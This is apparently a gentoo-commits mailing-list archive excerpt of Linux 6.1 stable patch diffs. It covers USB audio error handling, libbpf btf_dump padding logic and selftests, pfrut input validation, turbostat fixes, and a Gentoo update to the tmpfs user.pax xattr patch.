++ * @curve_duration_h: Curve duration high part
+  */
+ struct sof_ipc4_gain_data {
+ 	uint32_t channels;
+ 	uint32_t init_val;
+ 	uint32_t curve_type;
+ 	uint32_t reserved;
+-	uint32_t curve_duration;
++	uint32_t curve_duration_l;
++	uint32_t curve_duration_h;
+ } __aligned(8);
+ 
+ /**
+diff --git a/sound/usb/endpoint.c b/sound/usb/endpoint.c
+index 419302e2057e8..647fa054d8b1d 100644
+--- a/sound/usb/endpoint.c
++++ b/sound/usb/endpoint.c
+@@ -455,8 +455,8 @@ static void push_back_to_ready_list(struct snd_usb_endpoint *ep,
+  * This function is used both for implicit feedback endpoints and in low-
+  * latency playback mode.
+  */
+-void snd_usb_queue_pending_output_urbs(struct snd_usb_endpoint *ep,
+-				       bool in_stream_lock)
++int snd_usb_queue_pending_output_urbs(struct snd_usb_endpoint *ep,
++				      bool in_stream_lock)
+ {
+ 	bool implicit_fb = snd_usb_endpoint_implicit_feedback_sink(ep);
+ 
+@@ -480,7 +480,7 @@ void snd_usb_queue_pending_output_urbs(struct snd_usb_endpoint *ep,
+ 		spin_unlock_irqrestore(&ep->lock, flags);
+ 
+ 		if (ctx == NULL)
+-			return;
++			break;
+ 
+ 		/* copy over the length information */
+ 		if (implicit_fb) {
+@@ -495,11 +495,14 @@ void snd_usb_queue_pending_output_urbs(struct snd_usb_endpoint *ep,
+ 			break;
+ 		if (err < 0) {
+ 			/* push back to ready list again for -EAGAIN */
+-			if (err == -EAGAIN)
++			if (err == -EAGAIN) {
+ 				push_back_to_ready_list(ep, ctx);
+-			else
++				break;
++			}
++
++			if (!in_stream_lock)
+ 				notify_xrun(ep);
+-			return;
++			return -EPIPE;
+ 		}
+ 
+ 		err = usb_submit_urb(ctx->urb, GFP_ATOMIC);
+@@ -507,13 +510,16 @@ void snd_usb_queue_pending_output_urbs(struct snd_usb_endpoint *ep,
+ 			usb_audio_err(ep->chip,
+ 				      "Unable to submit urb #%d: %d at %s\n",
+ 				      ctx->index, err, __func__);
+-			notify_xrun(ep);
+-			return;
++			if (!in_stream_lock)
++				notify_xrun(ep);
++			return -EPIPE;
+ 		}
+ 
+ 		set_bit(ctx->index, &ep->active_mask);
+ 		atomic_inc(&ep->submitted_urbs);
+ 	}
++
++	return 0;
+ }
+ 
+ /*
+diff --git a/sound/usb/endpoint.h b/sound/usb/endpoint.h
+index 924f4351588ce..c09f68ce08b18 100644
+--- a/sound/usb/endpoint.h
++++ b/sound/usb/endpoint.h
+@@ -52,7 +52,7 @@ int snd_usb_endpoint_implicit_feedback_sink(struct snd_usb_endpoint *ep);
+ int snd_usb_endpoint_next_packet_size(struct snd_usb_endpoint *ep,
+ 				      struct snd_urb_ctx *ctx, int idx,
+ 				      unsigned int avail);
+-void snd_usb_queue_pending_output_urbs(struct snd_usb_endpoint *ep,
+-				       bool in_stream_lock);
++int snd_usb_queue_pending_output_urbs(struct snd_usb_endpoint *ep,
++				      bool in_stream_lock);
+ 
+ #endif /* __USBAUDIO_ENDPOINT_H */
+diff --git a/sound/usb/format.c b/sound/usb/format.c
+index 405dc0bf6678c..4b1c5ba121f39 100644
+--- a/sound/usb/format.c
++++ b/sound/usb/format.c
+@@ -39,8 +39,12 @@ static u64 parse_audio_format_i_type(struct snd_usb_audio *chip,
+ 	case UAC_VERSION_1:
+ 	default: {
+ 		struct uac_format_type_i_discrete_descriptor *fmt = _fmt;
+-		if (format >= 64)
+-			return 0; /* invalid format */
++		if (format >= 64) {
++			usb_audio_info(chip,
++				       "%u:%d: invalid format type 0x%llx is detected, processed as PCM\n",
++				       fp->iface, fp->altsetting, format);
++			format = UAC_FORMAT_TYPE_I_PCM;
++		}
+ 		sample_width = fmt->bBitResolution;
+ 		sample_bytes = fmt->bSubframeSize;
+ 		format = 1ULL << format;
+diff --git a/sound/usb/pcm.c b/sound/usb/pcm.c
+index 2c5765cbed2d6..1e1d7458bce10 100644
+--- a/sound/usb/pcm.c
++++ b/sound/usb/pcm.c
+@@ -1595,7 +1595,7 @@ static int snd_usb_pcm_playback_ack(struct snd_pcm_substream *substream)
+ 	 * outputs here
+ 	 */
+ 	if (!ep->active_mask)
+-		snd_usb_queue_pending_output_urbs(ep, true);
++		return snd_usb_queue_pending_output_urbs(ep, true);
+ 	return 0;
+ }
+ 
+diff --git a/tools/lib/bpf/btf_dump.c b/tools/lib/bpf/btf_dump.c
+index 0b470169729e6..56102711f395a 100644
+--- a/tools/lib/bpf/btf_dump.c
++++ b/tools/lib/bpf/btf_dump.c
+@@ -833,14 +833,9 @@ static bool btf_is_struct_packed(const struct btf *btf, __u32 id,
+ 				 const struct btf_type *t)
+ {
+ 	const struct btf_member *m;
+-	int align, i, bit_sz;
++	int max_align = 1, align, i, bit_sz;
+ 	__u16 vlen;
+ 
+-	align = btf__align_of(btf, id);
+-	/* size of a non-packed struct has to be a multiple of its alignment*/
+-	if (align && t->size % align)
+-		return true;
+-
+ 	m = btf_members(t);
+ 	vlen = btf_vlen(t);
+ 	/* all non-bitfield fields have to be naturally aligned */
+@@ -849,8 +844,11 @@ static bool btf_is_struct_packed(const struct btf *btf, __u32 id,
+ 		bit_sz = btf_member_bitfield_size(t, i);
+ 		if (align && bit_sz == 0 && m->offset % (8 * align) != 0)
+ 			return true;
++		max_align = max(align, max_align);
+ 	}
+-
++	/* size of a non-packed struct has to be a multiple of its alignment */
++	if (t->size % max_align != 0)
++		return true;
+ 	/*
+ 	 * if original struct was marked as packed, but its layout is
+ 	 * naturally aligned, we'll detect that it's not packed
+@@ -858,44 +856,97 @@ static bool btf_is_struct_packed(const struct btf *btf, __u32 id,
+ 	return false;
+ }
+ 
+-static int chip_away_bits(int total, int at_most)
+-{
+-	return total % at_most ? : at_most;
+-}
+-
+ static void btf_dump_emit_bit_padding(const struct btf_dump *d,
+-				      int cur_off, int m_off, int m_bit_sz,
+-				      int align, int lvl)
++				      int cur_off, int next_off, int next_align,
++				      bool in_bitfield, int lvl)
+ {
+-	int off_diff = m_off - cur_off;
+-	int ptr_bits = d->ptr_sz * 8;
++	const struct {
++		const char *name;
++		int bits;
++	} pads[] = {
++		{"long", d->ptr_sz * 8}, {"int", 32}, {"short", 16}, {"char", 8}
++	};
++	int new_off, pad_bits, bits, i;
++	const char *pad_type;
++
++	if (cur_off >= next_off)
++		return; /* no gap */
++
++	/* For filling out padding we want to take advantage of
++	 * natural alignment rules to minimize unnecessary explicit
++	 * padding. First, we find the largest type (among long, int,
++	 * short, or char) that can be used to force naturally aligned
++	 * boundary. Once determined, we'll use such type to fill in
++	 * the remaining padding gap. In some cases we can rely on
++	 * compiler filling some gaps, but sometimes we need to force
++	 * alignment to close natural alignment with markers like
++	 * `long: 0` (this is always the case for bitfields).  Note
++	 * that even if struct itself has, let's say 4-byte alignment
++	 * (i.e., it only uses up to int-aligned types), using `long:
++	 * X;` explicit padding doesn't actually change struct's
++	 * overall alignment requirements, but compiler does take into
++	 * account that type's (long, in this example) natural
++	 * alignment requirements when adding implicit padding. We use
++	 * this fact heavily and don't worry about ruining correct
++	 * struct alignment requirement.
++	 */
++	for (i = 0; i < ARRAY_SIZE(pads); i++) {
++		pad_bits = pads[i].bits;
++		pad_type = pads[i].name;
+ 
+-	if (off_diff <= 0)
+-		/* no gap */
+-		return;
+-	if (m_bit_sz == 0 && off_diff < align * 8)
+-		/* natural padding will take care of a gap */
+-		return;
++		new_off = roundup(cur_off, pad_bits);
++		if (new_off <= next_off)
++			break;
++	}
+ 
+-	while (off_diff > 0) {
+-		const char *pad_type;
+-		int pad_bits;
+-
+-		if (ptr_bits > 32 && off_diff > 32) {
+-			pad_type = "long";
+-			pad_bits = chip_away_bits(off_diff, ptr_bits);
+-		} else if (off_diff > 16) {
+-			pad_type = "int";
+-			pad_bits = chip_away_bits(off_diff, 32);
+-		} else if (off_diff > 8) {
+-			pad_type = "short";
+-			pad_bits = chip_away_bits(off_diff, 16);
+-		} else {
+-			pad_type = "char";
+-			pad_bits = chip_away_bits(off_diff, 8);
++	if (new_off > cur_off && new_off <= next_off) {
++		/* We need explicit `<type>: 0` aligning mark if next
++		 * field is right on alignment offset and its
++		 * alignment requirement is less strict than <type>'s
++		 * alignment (so compiler won't naturally align to the
++		 * offset we expect), or if subsequent `<type>: X`,
++		 * will actually completely fit in the remaining hole,
++		 * making compiler basically ignore `<type>: X`
++		 * completely.
++		 */
++		if (in_bitfield ||
++		    (new_off == next_off && roundup(cur_off, next_align * 8) != new_off) ||
++		    (new_off != next_off && next_off - new_off <= new_off - cur_off))
++			/* but for bitfields we'll emit explicit bit count */
++			btf_dump_printf(d, "\n%s%s: %d;", pfx(lvl), pad_type,
++					in_bitfield ? new_off - cur_off : 0);
++		cur_off = new_off;
++	}
++
++	/* Now we know we start at naturally aligned offset for a chosen
++	 * padding type (long, int, short, or char), and so the rest is just
++	 * a straightforward filling of remaining padding gap with full
++	 * `<type>: sizeof(<type>);` markers, except for the last one, which
++	 * might need smaller than sizeof(<type>) padding.
++	 */
++	while (cur_off != next_off) {
++		bits = min(next_off - cur_off, pad_bits);
++		if (bits == pad_bits) {
++			btf_dump_printf(d, "\n%s%s: %d;", pfx(lvl), pad_type, pad_bits);
++			cur_off += bits;
++			continue;
++		}
++		/* For the remainder padding that doesn't cover entire
++		 * pad_type bit length, we pick the smallest necessary type.
++		 * This is pure aesthetics, we could have just used `long`,
++		 * but having smallest necessary one communicates better the
++		 * scale of the padding gap.
++		 */
++		for (i = ARRAY_SIZE(pads) - 1; i >= 0; i--) {
++			pad_type = pads[i].name;
++			pad_bits = pads[i].bits;
++			if (pad_bits < bits)
++				continue;
++
++			btf_dump_printf(d, "\n%s%s: %d;", pfx(lvl), pad_type, bits);
++			cur_off += bits;
++			break;
+ 		}
+-		btf_dump_printf(d, "\n%s%s: %d;", pfx(lvl), pad_type, pad_bits);
+-		off_diff -= pad_bits;
+ 	}
+ }
+ 
+@@ -915,9 +966,11 @@ static void btf_dump_emit_struct_def(struct btf_dump *d,
+ {
+ 	const struct btf_member *m = btf_members(t);
+ 	bool is_struct = btf_is_struct(t);
+-	int align, i, packed, off = 0;
++	bool packed, prev_bitfield = false;
++	int align, i, off = 0;
+ 	__u16 vlen = btf_vlen(t);
+ 
++	align = btf__align_of(d->btf, id);
+ 	packed = is_struct ? btf_is_struct_packed(d->btf, id, t) : 0;
+ 
+ 	btf_dump_printf(d, "%s%s%s {",
+@@ -927,33 +980,36 @@ static void btf_dump_emit_struct_def(struct btf_dump *d,
+ 
+ 	for (i = 0; i < vlen; i++, m++) {
+ 		const char *fname;
+-		int m_off, m_sz;
++		int m_off, m_sz, m_align;
++		bool in_bitfield;
+ 
+ 		fname = btf_name_of(d, m->name_off);
+ 		m_sz = btf_member_bitfield_size(t, i);
+ 		m_off = btf_member_bit_offset(t, i);
+-		align = packed ? 1 : btf__align_of(d->btf, m->type);
++		m_align = packed ? 1 : btf__align_of(d->btf, m->type);
+ 
+-		btf_dump_emit_bit_padding(d, off, m_off, m_sz, align, lvl + 1);
++		in_bitfield = prev_bitfield && m_sz != 0;
++
++		btf_dump_emit_bit_padding(d, off, m_off, m_align, in_bitfield, lvl + 1);
+ 		btf_dump_printf(d, "\n%s", pfx(lvl + 1));
+ 		btf_dump_emit_type_decl(d, m->type, fname, lvl + 1);
+ 
+ 		if (m_sz) {
+ 			btf_dump_printf(d, ": %d", m_sz);
+ 			off = m_off + m_sz;
++			prev_bitfield = true;
+ 		} else {
+ 			m_sz = max((__s64)0, btf__resolve_size(d->btf, m->type));
+ 			off = m_off + m_sz * 8;
++			prev_bitfield = false;
+ 		}
++
+ 		btf_dump_printf(d, ";");
+ 	}
+ 
+ 	/* pad at the end, if necessary */
+-	if (is_struct) {
+-		align = packed ? 1 : btf__align_of(d->btf, id);
+-		btf_dump_emit_bit_padding(d, off, t->size * 8, 0, align,
+-					  lvl + 1);
+-	}
++	if (is_struct)
++		btf_dump_emit_bit_padding(d, off, t->size * 8, align, false, lvl + 1);
+ 
+ 	if (vlen)
+ 		btf_dump_printf(d, "\n");
+diff --git a/tools/power/acpi/tools/pfrut/pfrut.c b/tools/power/acpi/tools/pfrut/pfrut.c
+index 52aa0351533c3..388c9e3ad0407 100644
+--- a/tools/power/acpi/tools/pfrut/pfrut.c
++++ b/tools/power/acpi/tools/pfrut/pfrut.c
+@@ -97,7 +97,7 @@ static struct option long_options[] = {
+ static void parse_options(int argc, char **argv)
+ {
+ 	int option_index = 0;
+-	char *pathname;
++	char *pathname, *endptr;
+ 	int opt;
+ 
+ 	pathname = strdup(argv[0]);
+@@ -125,11 +125,23 @@ static void parse_options(int argc, char **argv)
+ 			log_getinfo = 1;
+ 			break;
+ 		case 'T':
+-			log_type = atoi(optarg);
++			log_type = strtol(optarg, &endptr, 0);
++			if (*endptr || (log_type != 0 && log_type != 1)) {
++				printf("Number expected: type(0:execution, 1:history) - Quit.\n");
++				exit(1);
++			}
++
+ 			set_log_type = 1;
+ 			break;
+ 		case 'L':
+-			log_level = atoi(optarg);
++			log_level = strtol(optarg, &endptr, 0);
++			if (*endptr ||
++			    (log_level != 0 && log_level != 1 &&
++			     log_level != 2 && log_level != 4)) {
++				printf("Number expected: level(0, 1, 2, 4) - Quit.\n");
++				exit(1);
++			}
++
+ 			set_log_level = 1;
+ 			break;
+ 		case 'R':
+diff --git a/tools/power/x86/turbostat/turbostat.8 b/tools/power/x86/turbostat/turbostat.8
+index c7b26a3603afe..3e1a4c4be001a 100644
+--- a/tools/power/x86/turbostat/turbostat.8
++++ b/tools/power/x86/turbostat/turbostat.8
+@@ -344,6 +344,8 @@ Alternatively, non-root users can be enabled to run turbostat this way:
+ 
+ # chmod +r /dev/cpu/*/msr
+ 
++# chmod +r /dev/cpu_dma_latency
++
+ .B "turbostat "
+ reads hardware counters, but doesn't write them.
+ So it will not interfere with the OS or other programs, including
+diff --git a/tools/power/x86/turbostat/turbostat.c b/tools/power/x86/turbostat/turbostat.c
+index aba460410dbd1..c61c6c704fbe6 100644
+--- a/tools/power/x86/turbostat/turbostat.c
++++ b/tools/power/x86/turbostat/turbostat.c
+@@ -4426,7 +4426,7 @@ int print_hwp(struct thread_data *t, struct core_data *c, struct pkg_data *p)
+ 
+ 	fprintf(outf, "cpu%d: MSR_HWP_STATUS: 0x%08llx "
+ 		"(%sGuaranteed_Perf_Change, %sExcursion_Min)\n",
+-		cpu, msr, ((msr) & 0x1) ? "" : "No-", ((msr) & 0x2) ? "" : "No-");
++		cpu, msr, ((msr) & 0x1) ? "" : "No-", ((msr) & 0x4) ? "" : "No-");
+ 
+ 	return 0;
+ }
+@@ -5482,7 +5482,7 @@ void print_dev_latency(void)
+ 
+ 	retval = read(fd, (void *)&value, sizeof(int));
+ 	if (retval != sizeof(int)) {
+-		warn("read %s\n", path);
++		warn("read failed %s\n", path);
+ 		close(fd);
+ 		return;
+ 	}
+diff --git a/tools/testing/selftests/bpf/progs/btf_dump_test_case_bitfields.c b/tools/testing/selftests/bpf/progs/btf_dump_test_case_bitfields.c
+index e5560a6560309..e01690618e1ee 100644
+--- a/tools/testing/selftests/bpf/progs/btf_dump_test_case_bitfields.c
++++ b/tools/testing/selftests/bpf/progs/btf_dump_test_case_bitfields.c
+@@ -53,7 +53,7 @@ struct bitfields_only_mixed_types {
+  */
+ /* ------ END-EXPECTED-OUTPUT ------ */
+ struct bitfield_mixed_with_others {
+-	long: 4; /* char is enough as a backing field */
++	char: 4; /* char is enough as a backing field */
+ 	int a: 4;
+ 	/* 8-bit implicit padding */
+ 	short b; /* combined with previous bitfield */
+diff --git a/tools/testing/selftests/bpf/progs/btf_dump_test_case_packing.c b/tools/testing/selftests/bpf/progs/btf_dump_test_case_packing.c
+index e304b6204bd9d..7998f27df7ddd 100644
+--- a/tools/testing/selftests/bpf/progs/btf_dump_test_case_packing.c
++++ b/tools/testing/selftests/bpf/progs/btf_dump_test_case_packing.c
+@@ -58,7 +58,81 @@ union jump_code_union {
+ 	} __attribute__((packed));
+ };
+ 
+-/*------ END-EXPECTED-OUTPUT ------ */
++/* ----- START-EXPECTED-OUTPUT ----- */
++/*
++ *struct nested_packed_but_aligned_struct {
++ *	int x1;
++ *	int x2;
++ *};
++ *
++ *struct outer_implicitly_packed_struct {
++ *	char y1;
++ *	struct nested_packed_but_aligned_struct y2;
++ *} __attribute__((packed));
++ *
++ */
++/* ------ END-EXPECTED-OUTPUT ------ */
++
++struct nested_packed_but_aligned_struct {
++	int x1;
++	int x2;
++} __attribute__((packed));
++
++struct outer_implicitly_packed_struct {
++	char y1;
++	struct nested_packed_but_aligned_struct y2;
++};
++/* ----- START-EXPECTED-OUTPUT ----- */
++/*
++ *struct usb_ss_ep_comp_descriptor {
++ *	char: 8;
++ *	char bDescriptorType;
++ *	char bMaxBurst;
++ *	short wBytesPerInterval;
++ *};
++ *
++ *struct usb_host_endpoint {
++ *	long: 64;
++ *	char: 8;
++ *	struct usb_ss_ep_comp_descriptor ss_ep_comp;
++ *	long: 0;
++ *} __attribute__((packed));
++ *
++ */
++/* ------ END-EXPECTED-OUTPUT ------ */
++
++struct usb_ss_ep_comp_descriptor {
++	char: 8;
++	char bDescriptorType;
++	char bMaxBurst;
++	int: 0;
++	short wBytesPerInterval;
++} __attribute__((packed));
++
++struct usb_host_endpoint {
++	long: 64;
++	char: 8;
++	struct usb_ss_ep_comp_descriptor ss_ep_comp;
++	long: 0;
++};
++
++/* ----- START-EXPECTED-OUTPUT ----- */
++struct nested_packed_struct {
++	int a;
++	char b;
++} __attribute__((packed));
++
++struct outer_nonpacked_struct {
++	short a;
++	struct nested_packed_struct b;
++};
++
++struct outer_packed_struct {
++	short a;
++	struct nested_packed_struct b;
++} __attribute__((packed));
++
++/* ------ END-EXPECTED-OUTPUT ------ */
+ 
+ int f(struct {
+ 	struct packed_trailing_space _1;
+@@ -69,6 +143,10 @@ int f(struct {
+ 	union union_is_never_packed _6;
+ 	union union_does_not_need_packing _7;
+ 	union jump_code_union _8;
++	struct outer_implicitly_packed_struct _9;
++	struct usb_host_endpoint _10;
++	struct outer_nonpacked_struct _11;
++	struct outer_packed_struct _12;
+ } *_)
+ {
+ 	return 0;
+diff --git a/tools/testing/selftests/bpf/progs/btf_dump_test_case_padding.c b/tools/testing/selftests/bpf/progs/btf_dump_test_case_padding.c
+index f2661c8d2d900..79276fbe454a8 100644
+--- a/tools/testing/selftests/bpf/progs/btf_dump_test_case_padding.c
++++ b/tools/testing/selftests/bpf/progs/btf_dump_test_case_padding.c
+@@ -19,7 +19,7 @@ struct padded_implicitly {
+ /*
+  *struct padded_explicitly {
+  *	int a;
+- *	int: 32;
++ *	long: 0;
+  *	int b;
+  *};
+  *
+@@ -28,41 +28,28 @@ struct padded_implicitly {
+ 
+ struct padded_explicitly {
+ 	int a;
+-	int: 1; /* algo will explicitly pad with full 32 bits here */
++	int: 1; /* algo will emit aligning `long: 0;` here */
+ 	int b;
+ };
+ 
+ /* ----- START-EXPECTED-OUTPUT ----- */
+-/*
+- *struct padded_a_lot {
+- *	int a;
+- *	long: 32;
+- *	long: 64;
+- *	long: 64;
+- *	int b;
+- *};
+- *
+- */
+-/* ------ END-EXPECTED-OUTPUT ------ */
+-
+ struct padded_a_lot {
+ 	int a;
+-	/* 32 bit of implicit padding here, which algo will make explicit */
+ 	long: 64;
+ 	long: 64;
+ 	int b;
+ };
+ 
++/* ------ END-EXPECTED-OUTPUT ------ */
++
+ /* ----- START-EXPECTED-OUTPUT ----- */
+ /*
+  *struct padded_cache_line {
+  *	int a;
+- *	long: 32;
+  *	long: 64;
+  *	long: 64;
+  *	long: 64;
+  *	int b;
+- *	long: 32;
+  *	long: 64;
+  *	long: 64;
+  *	long: 64;
+@@ -85,7 +72,7 @@ struct padded_cache_line {
+  *struct zone {
+  *	int a;
+  *	short b;
+- *	short: 16;
++ *	long: 0;
+  *	struct zone_padding __pad__;
+  *};
+  *
+@@ -102,12 +89,160 @@ struct zone {
+ 	struct zone_padding __pad__;
+ };
+ 
++/* ----- START-EXPECTED-OUTPUT ----- */
++struct padding_wo_named_members {
++	long: 64;
++	long: 64;
++};
++
++struct padding_weird_1 {
++	int a;
++	long: 64;
++	short: 16;
++	short b;
++};
++
++/* ------ END-EXPECTED-OUTPUT ------ */
++
++/* ----- START-EXPECTED-OUTPUT ----- */
++/*
++ *struct padding_weird_2 {
++ *	long: 56;
++ *	char a;
++ *	long: 56;
++ *	char b;
++ *	char: 8;
++ *};
++ *
++ */
++/* ------ END-EXPECTED-OUTPUT ------ */
++struct padding_weird_2 {
++	int: 32;	/* these paddings will be collapsed into `long: 56;` */
++	short: 16;
++	char: 8;
++	char a;
++	int: 32;	/* these paddings will be collapsed into `long: 56;` */
++	short: 16;
++	char: 8;
++	char b;
++	char: 8;
++};
++
++/* ----- START-EXPECTED-OUTPUT ----- */
++struct exact_1byte {
++	char x;
++};
++
++struct padded_1byte {
++	char: 8;
++};
++
++struct exact_2bytes {
++	short x;
++};
++
++struct padded_2bytes {
++	short: 16;
++};
++
++struct exact_4bytes {
++	int x;
++};
++
++struct padded_4bytes {
++	int: 32;
++};
++
++struct exact_8bytes {
++	long x;
++};
++
++struct padded_8bytes {
++	long: 64;
++};
++
++struct ff_periodic_effect {
++	int: 32;
++	short magnitude;
++	long: 0;
++	short phase;
++	long: 0;
++	int: 32;
++	int custom_len;
++	short *custom_data;
++};
++
++struct ib_wc {
++	long: 64;
++	long: 64;
++	int: 32;
++	int byte_len;
++	void *qp;
++	union {} ex;
++	long: 64;
++	int slid;
++	int wc_flags;
++	long: 64;
++	char smac[6];
++	long: 0;
++	char network_hdr_type;
++};
++
++struct acpi_object_method {
++	long: 64;
++	char: 8;
++	char type;
++	short reference_count;
++	char flags;
++	short: 0;
++	char: 8;
++	char sync_level;
++	long: 64;
++	void *node;
++	void *aml_start;
++	union {} dispatch;
++	long: 64;
++	int aml_length;
++};
++
++struct nested_unpacked {
++	int x;
++};
++
++struct nested_packed {
++	struct nested_unpacked a;
++	char c;
++} __attribute__((packed));
++
++struct outer_mixed_but_unpacked {
++	struct nested_packed b1;
++	short a1;
++	struct nested_packed b2;
++};
++
++/* ------ END-EXPECTED-OUTPUT ------ */
++
+ int f(struct {
+ 	struct padded_implicitly _1;
+ 	struct padded_explicitly _2;
+ 	struct padded_a_lot _3;
+ 	struct padded_cache_line _4;
+ 	struct zone _5;
++	struct padding_wo_named_members _6;
++	struct padding_weird_1 _7;
++	struct padding_weird_2 _8;
++	struct exact_1byte _100;
++	struct padded_1byte _101;
++	struct exact_2bytes _102;
++	struct padded_2bytes _103;
++	struct exact_4bytes _104;
++	struct padded_4bytes _105;
++	struct exact_8bytes _106;
++	struct padded_8bytes _107;
++	struct ff_periodic_effect _200;
++	struct ib_wc _201;
++	struct acpi_object_method _202;
++	struct outer_mixed_but_unpacked _203;
+ } *_)
+ {
+ 	return 0;


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-03-30 20:52 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-03-30 20:52 UTC (permalink / raw
  To: gentoo-commits

commit:     62cea8d31c808e0c987542d8c03499614e657b30
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Thu Mar 30 20:52:42 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Thu Mar 30 20:52:42 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=62cea8d3

Update namespace user.pax.* on tmpfs patch

Bug: https://bugs.gentoo.org/show_bug.cgi?id=903513

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 1500_XATTR_USER_PREFIX.patch | 14 +++++++-------
 1 file changed, 7 insertions(+), 7 deletions(-)

diff --git a/1500_XATTR_USER_PREFIX.patch b/1500_XATTR_USER_PREFIX.patch
index fac3eed7..1d1a9301 100644
--- a/1500_XATTR_USER_PREFIX.patch
+++ b/1500_XATTR_USER_PREFIX.patch
@@ -26,12 +26,12 @@ the XATTR_PAX flags preserved.
 +#define XATTR_NAME_PAX_FLAGS XATTR_PAX_PREFIX XATTR_PAX_FLAGS_SUFFIX
  
  #endif /* _UAPI_LINUX_XATTR_H */
---- a/mm/shmem.c	2022-11-22 05:57:29.011626215 -0500
-+++ b/mm/shmem.c	2022-11-22 06:03:33.165939400 -0500
-@@ -3297,6 +3297,14 @@ static int shmem_xattr_handler_set(const
- 	struct shmem_inode_info *info = SHMEM_I(inode);
+--- a/mm/shmem.c	2023-03-29 18:54:52.431866914 -0400
++++ b/mm/shmem.c	2023-03-29 18:57:55.145689335 -0400
+@@ -3310,6 +3310,14 @@ static int shmem_xattr_handler_set(const
  	int err;
  
+ 	name = xattr_full_name(handler, name);
 +
 +	if (!strncmp(name, XATTR_USER_PREFIX, XATTR_USER_PREFIX_LEN)) {
 +		if (strcmp(name, XATTR_NAME_PAX_FLAGS))
@@ -40,10 +40,10 @@ the XATTR_PAX flags preserved.
 +			return -EINVAL;
 +	}
 +
- 	name = xattr_full_name(handler, name);
  	err = simple_xattr_set(&info->xattrs, name, value, size, flags, NULL);
  	if (!err) {
-@@ -3312,6 +3320,12 @@ static const struct xattr_handler shmem_
+ 		inode->i_ctime = current_time(inode);
+@@ -3324,6 +3332,12 @@ static const struct xattr_handler shmem_
  	.set = shmem_xattr_handler_set,
  };
  
@@ -56,7 +56,7 @@ the XATTR_PAX flags preserved.
  static const struct xattr_handler shmem_trusted_xattr_handler = {
  	.prefix = XATTR_TRUSTED_PREFIX,
  	.get = shmem_xattr_handler_get,
-@@ -3325,6 +3339,7 @@ static const struct xattr_handler *shmem
+@@ -3337,6 +3351,7 @@ static const struct xattr_handler *shmem
  #endif
  	&shmem_security_xattr_handler,
  	&shmem_trusted_xattr_handler,


* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-03-30 11:21 Alice Ferrazzi
  0 siblings, 0 replies; 161+ messages in thread
From: Alice Ferrazzi @ 2023-03-30 11:21 UTC (permalink / raw
  To: gentoo-commits

commit:     575a6ac1a723480547de2ed4dcbdff8e1e90a96c
Author:     Alice Ferrazzi <alicef <AT> gentoo <DOT> org>
AuthorDate: Thu Mar 30 11:20:47 2023 +0000
Commit:     Alice Ferrazzi <alicef <AT> gentoo <DOT> org>
CommitDate: Thu Mar 30 11:20:47 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=575a6ac1

Linux patch 6.1.22

Signed-off-by: Alice Ferrazzi <alicef <AT> gentoo.org>

 0000_README             |    4 +
 1021_linux-6.1.22.patch | 9010 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 9014 insertions(+)

diff --git a/0000_README b/0000_README
index 2837c0f3..dac87a0b 100644
--- a/0000_README
+++ b/0000_README
@@ -127,6 +127,10 @@ Patch:  1020_linux-6.1.21.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.21
 
+Patch:  1021_linux-6.1.22.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.22
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1021_linux-6.1.22.patch b/1021_linux-6.1.22.patch
new file mode 100644
index 00000000..bdd013bc
--- /dev/null
+++ b/1021_linux-6.1.22.patch
@@ -0,0 +1,9010 @@
+diff --git a/Makefile b/Makefile
+index 0a9f0770bdf3a..c3d44de8850cf 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 21
++SUBLEVEL = 22
+ EXTRAVERSION =
+ NAME = Hurr durr I'ma ninja sloth
+ 
+diff --git a/arch/arm/boot/dts/e60k02.dtsi b/arch/arm/boot/dts/e60k02.dtsi
+index 935e2359f8dfa..07ae964863850 100644
+--- a/arch/arm/boot/dts/e60k02.dtsi
++++ b/arch/arm/boot/dts/e60k02.dtsi
+@@ -302,6 +302,7 @@
+ 
+ &usbotg1 {
+ 	pinctrl-names = "default";
++	pinctrl-0 = <&pinctrl_usbotg1>;
+ 	disable-over-current;
+ 	srp-disable;
+ 	hnp-disable;
+diff --git a/arch/arm/boot/dts/e70k02.dtsi b/arch/arm/boot/dts/e70k02.dtsi
+index 27ef9a62b23cf..a1f9fbd6004aa 100644
+--- a/arch/arm/boot/dts/e70k02.dtsi
++++ b/arch/arm/boot/dts/e70k02.dtsi
+@@ -312,6 +312,7 @@
+ 
+ &usbotg1 {
+ 	pinctrl-names = "default";
++	pinctrl-0 = <&pinctrl_usbotg1>;
+ 	disable-over-current;
+ 	srp-disable;
+ 	hnp-disable;
+diff --git a/arch/arm/boot/dts/imx6sl-tolino-shine2hd.dts b/arch/arm/boot/dts/imx6sl-tolino-shine2hd.dts
+index 663ee9df79e67..d6eee157c63b7 100644
+--- a/arch/arm/boot/dts/imx6sl-tolino-shine2hd.dts
++++ b/arch/arm/boot/dts/imx6sl-tolino-shine2hd.dts
+@@ -597,6 +597,7 @@
+ 
+ &usbotg1 {
+ 	pinctrl-names = "default";
++	pinctrl-0 = <&pinctrl_usbotg1>;
+ 	disable-over-current;
+ 	srp-disable;
+ 	hnp-disable;
+diff --git a/arch/arm64/boot/dts/freescale/imx8dxl-evk.dts b/arch/arm64/boot/dts/freescale/imx8dxl-evk.dts
+index ca2a43e0cbf61..3af4c76369741 100644
+--- a/arch/arm64/boot/dts/freescale/imx8dxl-evk.dts
++++ b/arch/arm64/boot/dts/freescale/imx8dxl-evk.dts
+@@ -99,8 +99,6 @@
+ 	phy-handle = <&ethphy0>;
+ 	nvmem-cells = <&fec_mac1>;
